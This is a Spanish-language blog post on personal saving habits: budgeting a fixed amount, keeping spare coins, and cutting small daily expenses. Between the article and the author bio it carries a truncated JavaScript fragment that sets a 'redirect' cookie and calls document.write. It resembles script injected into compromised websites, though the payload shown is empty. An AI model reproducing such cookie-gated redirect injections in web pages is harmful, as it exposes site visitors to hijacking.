Llama AHORA! asesoría gratuita

01800 110 3000

Ahorro

Publicado el mayo 23rd, 2017 | por Leticia Franco

¡No me alcanza para ahorrar!

El ahorro se ve como un sacrificio y no como un beneficio, por ello, su posterga. Sin embargo, no es así. Si bien no da una satisfacción inmediata sí la da a la larga, ¡piénsalo!

Y por ese sentimiento que se le tiene se deja al final de todos los gastos, es decir, se ahorra lo que sobra, pero dificilmente sobra. Por eso es necesario hacerlo un hábito e e incluirlo en el presupuesto. Al ahorro se le deba dar un monto y una periodicidad y no dejarlo al aire pues, muy seguramente será un caso fallido.

Si tú hoy tuvieras una emergencia por enfermedad, accidente, desempleo, ¿podrías afrontar el hecho con tus ahorros?

“No hay cantidad pequeña para ahorrar”, Antonio S. asesor de Cura Deuda

#1 Empieza con poquito.

Antonio, está consciente que debe ahorrar para su futuro o para afrontar alguna adversidad. Así que, ahorra de dos formas:

Uno de sus ahorros consiste en una cantidad fija mensual que está anexada en su presupuesto. En el momento que Antonio cobra destina el monto a este rubro, él no lo deja al final.

Su segundo ahorro son las monedas de menor denominación. ” La mayoría de la gente las evitas y no las recibe o las extravía, piensan que por ser centavos no valen”. Entonces, Toño no las rechaza; las ahorra”. 

# 2 Adiós gasto hormiga

El gasto hormiga es aquella cantidad pequeña que gastas y que te parece sin importancia por ser pequeña, pero si las sumaras sería una cantidad considerable que estaríai genial para tu ahorro, ¡haz cuentas!

#3 Deja la pereza

Eres de los que diario usa Uber porque se le hizo tarde o por simple gusto, pero tu frase favorita es “no ahorro porque no me alcanza”. Entonces, algo no cuadra en tu discurso (pretexto) ¿no crees?

#4 Compra sólo lo que necesites 

Esta máxima, está buenisima que te la preguntes antes de hacer una compra. Te exhorto a que hoy te eches un clavado a tu ropa, zapatos, cosméticos, bolsos, accesorios, etc. Y hagas una lista de todo eso que compraste y no has usado o sólo has usado una vez. Si sumas el precio de cada una, ¿cuánto es? esa cantidad hubiera estado perfecta para ahorrar, ¿no?

 

// =(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
// ]]>//


Sobre el Autor

Egresada de la Universidad de Periodismo y Arte en Radio y Televisión. Prefiere leer los periódicos físicos que virtuales. Ha adoptado nuevos hábitos financieros, por ejemplo, evita el gasto hormiga.



Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos necesarios están marcados *

Back to Top ↑